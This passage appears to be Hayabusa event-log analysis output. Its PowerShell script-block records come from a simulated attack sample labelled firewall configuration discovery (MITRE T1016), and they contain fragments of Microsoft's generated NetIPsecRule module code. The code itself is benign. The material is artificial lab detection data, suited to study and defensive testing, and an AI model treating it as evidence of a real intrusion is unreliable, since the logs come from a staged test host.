$__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'MaxReturnPathLifetimeSeconds'; ParameterType = 'System.UInt32'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('EncryptedTunnelBypass')) { [object]$__cmdletization_value = ${EncryptedTunnelBypass} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'BypassTunnelIfEncrypted'; ParameterType = 'System.Boolean'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'BypassTunnelIfEncrypted'; ParameterType = 'System.Boolean'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('RequireAuthorization')) { [object]$__cmdletization_value = ${RequireAuthorization} $__cmdletization_methodParameter = Microsoft.PowerShell.,../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx 2021-10-25 16:23:05.754 +09:00,FS03.offsec.lan,4104,info,,PwSh Scriptblock Log,"Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'RequireAuthorization'; ParameterType = 'System.Boolean'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'RequireAuthorization'; ParameterType = 'System.Boolean'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('User')) { [object]$__cmdletization_value = ${User} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'Users'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'Users'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Machine')) { [object]$__cmdletization_value = ${Machine} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'Machines'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'Machines'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('LocalAddress')) { [object]$__cmdletization_value = ${LocalAddress} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'cim:OperationOption:LocalAddress'; ParameterType = 'System.String[]'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'cim:OperationOption:LocalAddress'; ParameterType = 'System.String[]'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('RemoteAddress')) { [object]$__cmdletization_value = ${RemoteAddress} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'cim:OperationOption:RemoteAddress'; ParameterType = 'System.String[]'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'cim:OperationOption:RemoteAddress'; ParameterType = 'System.String[]'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Protocol')) { [object]$__cmdletization_value = ${Protocol} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'cim:OperationOption:Protocol'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'cim:OperationOption:Protocol'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('LocalPort')) { [object]$__cmdletization_value = ${LocalPort} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'cim:OperationOption:LocalPort'; ParameterType = 'System.String[]'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'cim:OperationOption:LocalPort'; ParameterType = 'System.String[]'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('RemotePort')) { [object]$__cmdletization_value = ${RemotePort} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'cim:OperationOption:RemotePort'; ParameterType = 'System.String[]'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'cim:OperationOption:RemotePort'; ParameterType = 'System.String[]'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('InterfaceAlias')) { [object]$__cmdletization_value = ${InterfaceAlias} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'cim:OperationOption:InterfaceAlias'; ParameterType = 'System.Management.Automation.WildcardPattern[]'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'cim:OperationOption:InterfaceAlias'; ParameterType = 'System.Management.Automation.WildcardPattern[]'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('InterfaceType')) { [object]$__cmdletization_value = ${InterfaceType} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'cim:OperationOption:InterfaceType'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.InterfaceType'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'cim:OperationOption:InterfaceType'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.InterfaceType'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) $__cmdletization_returnValue = $null $__cmdletization_methodInvocationInfo = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodInvocationInfo @('cim:CreateInstance', $__cmdletization_methodParameters, $__cmdletization_returnValue) $__cmdletization_objectModelWrapper.ProcessRecord($__cmdletization_methodInvocationInfo) } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } End { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper.EndProcessing() } } catch { throw } } # .EXTERNALHELP NetIPsecRule.cmdletDefinition.cdxml-Help.xml } Microsoft.PowerShell.Core\Export-ModuleMember -Function 'New-NetIPsecRule' function Show-NetIPsecRule { [CmdletBinding(PositionalBinding=$false)] [OutputType([Microsoft.Management.Infrastructure.CimInstance[]])][OutputType('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/NetSecurityDeepEnumElement')] param( [Parameter(ParameterSetName='EnumerateFull1')] [string] ${PolicyStore}, [Parameter(ParameterSetName='EnumerateFull1')] [string] ${GPOSession}, [Parameter(ParameterSetName='EnumerateFull1')] [Alias('Session')] [ValidateNotNullOrEmpty()] [Microsoft.Management.Infrastructure.CimSession[]] ${CimSession}, [Parameter(ParameterSetName='EnumerateFull1')] [int] ${ThrottleLimit}, [Parameter(ParameterSetName='EnumerateFull1')] [switch] ${AsJob}) DynamicParam { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper = Microsoft.PowerShell.Utility\New-Object $script:ObjectModelWrapper $__cmdletization_objectModelWrapper.Initialize($PSCmdlet, $script:ClassName, $script:ClassVersion, $script:ModuleVersion, $script:PrivateData) if ($__cmdletization_objectModelWrapper -is [System.Management.Automation.IDynamicParameters]) { ([System.Management.Automation.IDynamicParameters]$__cmdletization_objectModelWrapper).GetDynamicParameters() } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Begin { $__cmdletization_exceptionHasBeenThrown = $false try { __cmdletization_BindCommonParameters $__cmdletization_objectModelWrapper $PSBoundParameters $__cmdletization_objectModelWrapper.BeginProcessing() } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Process { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_methodParameters = Microsoft.PowerShell.Utility\New-Object 'System.Collections.Generic.List[Microsoft.PowerShell.Cmdletization.MethodParameter]' [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('PolicyStore')) { [object]$__cmdletization_value = ${PolicyStore} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'cim:OperationOption:PolicyStore'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'cim:OperationOption:PolicyStore'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('GPOSession')) { [object]$__cmdletization_value = ${GPOSession} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'cim:OperationOption:GPOSession'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'cim:OperationOption:GPOSession'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'Dependents'; ParameterType = 'Microsoft.M",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx 2021-10-25 16:23:05.754 +09:00,FS03.offsec.lan,4104,info,,PwSh Scriptblock Log,"anagement.Infrastructure.CimInstance[]'; Bindings = 'Out'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} $__cmdletization_methodParameter.ParameterTypeName = 'Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/NetSecurityDeepEnumElement' $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) $__cmdletization_returnValue = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{ Name = 'ReturnValue'; ParameterType = 'System.Int32'; Bindings = 'Error'; Value = $null; IsValuePresent = $false } $__cmdletization_methodInvocationInfo = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodInvocationInfo @('EnumerateFull', $__cmdletization_methodParameters, $__cmdletization_returnValue) $__cmdletization_objectModelWrapper.ProcessRecord($__cmdletization_methodInvocationInfo) } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } End { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper.EndProcessing() } } catch { throw } } # .EXTERNALHELP NetIPsecRule.cmdletDefinition.cdxml-Help.xml } Microsoft.PowerShell.Core\Export-ModuleMember -Function 'Show-NetIPsecRule' function Find-NetIPsecRule { [CmdletBinding(PositionalBinding=$false)] [OutputType([Microsoft.Management.Infrastructure.CimInstance[]])] param( [Parameter(ParameterSetName='Find2')] [string] ${LocalAddress}, [Parameter(ParameterSetName='Find2', Mandatory=$true)] [string] ${RemoteAddress}, [Parameter(ParameterSetName='Find2')] [string] ${Protocol}, [Parameter(ParameterSetName='Find2')] [uint16] ${LocalPort}, [Parameter(ParameterSetName='Find2')] [uint16] ${RemotePort}, [Parameter(ParameterSetName='Find2')] [Alias('Session')] [ValidateNotNullOrEmpty()] [Microsoft.Management.Infrastructure.CimSession[]] ${CimSession}, [Parameter(ParameterSetName='Find2')] [int] ${ThrottleLimit}, [Parameter(ParameterSetName='Find2')] [switch] ${AsJob}) DynamicParam { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper = Microsoft.PowerShell.Utility\New-Object $script:ObjectModelWrapper $__cmdletization_objectModelWrapper.Initialize($PSCmdlet, $script:ClassName, $script:ClassVersion, $script:ModuleVersion, $script:PrivateData) if ($__cmdletization_objectModelWrapper -is [System.Management.Automation.IDynamicParameters]) { ([System.Management.Automation.IDynamicParameters]$__cmdletization_objectModelWrapper).GetDynamicParameters() } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Begin { $__cmdletization_exceptionHasBeenThrown = $false try { __cmdletization_BindCommonParameters $__cmdletization_objectModelWrapper $PSBoundParameters $__cmdletization_objectModelWrapper.BeginProcessing() } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Process { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_methodParameters = Microsoft.PowerShell.Utility\New-Object 'System.Collections.Generic.List[Microsoft.PowerShell.Cmdletization.MethodParameter]' [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('LocalAddress')) { [object]$__cmdletization_value = ${LocalAddress} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'LocalAddress'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'LocalAddress'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('RemoteAddress')) { [object]$__cmdletization_value = ${RemoteAddress} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'RemoteAddress'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'RemoteAddress'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Protocol')) { [object]$__cmdletization_value = ${Protocol} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'Protocol'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'Protocol'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('LocalPort')) { [object]$__cmdletization_value = ${LocalPort} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'LocalPort'; ParameterType = 'System.UInt16'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'LocalPort'; ParameterType = 'System.UInt16'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('RemotePort')) { [object]$__cmdletization_value = ${RemotePort} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'RemotePort'; ParameterType = 'System.UInt16'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'RemotePort'; ParameterType = 'System.UInt16'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'CmdletOutput'; ParameterType = 'Microsoft.Management.Infrastructure.CimInstance[]'; Bindings = 'Out'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) $__cmdletization_returnValue = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{ Name = 'ReturnValue'; ParameterType = 'System.Int32'; Bindings = 'Error'; Value = $null; IsValuePresent = $false } $__cmdletization_methodInvocationInfo = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodInvocationInfo @('Find', $__cmdletization_methodParameters, $__cmdletization_returnValue) $__cmdletization_objectModelWrapper.ProcessRecord($__cmdletization_methodInvocationInfo) } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } End { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper.EndProcessing() } } catch { throw } } # .EXTERNALHELP NetIPsecRule.cmdletDefinition.cdxml-Help.xml } Microsoft.PowerShell.Core\Export-ModuleMember -Function 'Find-NetIPsecRule' function Get-NetIPsecRule { [CmdletBinding(DefaultParameterSetName='GetAll', PositionalBinding=$false)] [OutputType([Microsoft.Management.Infrastructure.CimInstance])] [OutputType('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetConSecRule')] param( [Parameter(ParameterSetName='ByIPsecRuleName', Mandatory=$true, Position=0, ValueFromPipelineByPropertyName=$true)] [Alias('ID','Name')] [ValidateNotNull()] [string[]] ${IPsecRuleName}, [Parameter(ParameterSetName='ByDisplayName', Mandatory=$true)] [ValidateNotNull()] [string[]] ${DisplayName}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Description}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${DisplayGroup}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Group}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Enabled[]] ${Enabled}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.IPsecMode[]] ${Mode}, [Parameter(ParameterSetName='ByQuery')] [Alias('SecIn')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.SecurityPolicy[]] ${InboundSecurity}, [Parameter(ParameterSetName='ByQuery')] [Alias('SecOut')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.SecurityPolicy[]] ${OutboundSecurity}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${QuickModeCryptoSet}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Phase1AuthSet}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Phase2AuthSet}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.KeyModule[]] ${KeyModule}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [bool[]] ${AllowWatchKey}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [bool[]] ${AllowSetKey}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${RemoteTunnelHostname}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [uint32[]] ${ForwardPathLifetime}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [bool[]] ${EncryptedTunnelBypass}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [bool[]] ${RequireAuthorization}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${User}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Machine}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.PrimaryStatus[]] ${PrimaryStatus}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Status}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${PolicyStoreSource}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.PolicyStoreType[]] ${PolicyStoreSourceType}, [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetAddressFilter')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallAddressFilter}, [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetInterfaceFilter')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallInterfaceFilter}, [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetInterfaceTypeFilter')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallInterfaceTypeFilter}, [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter', Mandatory=$true, Value",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx 2021-10-25 16:23:05.754 +09:00,FS03.offsec.lan,4104,info,,PwSh Scriptblock Log,"FromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetProtocolPortFilter')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallPortFilter}, [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetFirewallProfile')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallProfile}, [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase2AuthSet', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetIKEP2AuthSet')] [ValidateNotNull()] [ciminstance] ${AssociatedNetIPsecPhase2AuthSet}, [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetIKEP1AuthSet')] [ValidateNotNull()] [ciminstance] ${AssociatedNetIPsecPhase1AuthSet}, [Parameter(ParameterSetName='ByAssociatedNetIPsecQuickModeCryptoSet', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetIKEQMCryptoSet')] [ValidateNotNull()] [ciminstance] ${AssociatedNetIPsecQuickModeCryptoSet}, [Parameter(ParameterSetName='GetAll')] [switch] ${All}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase2AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] 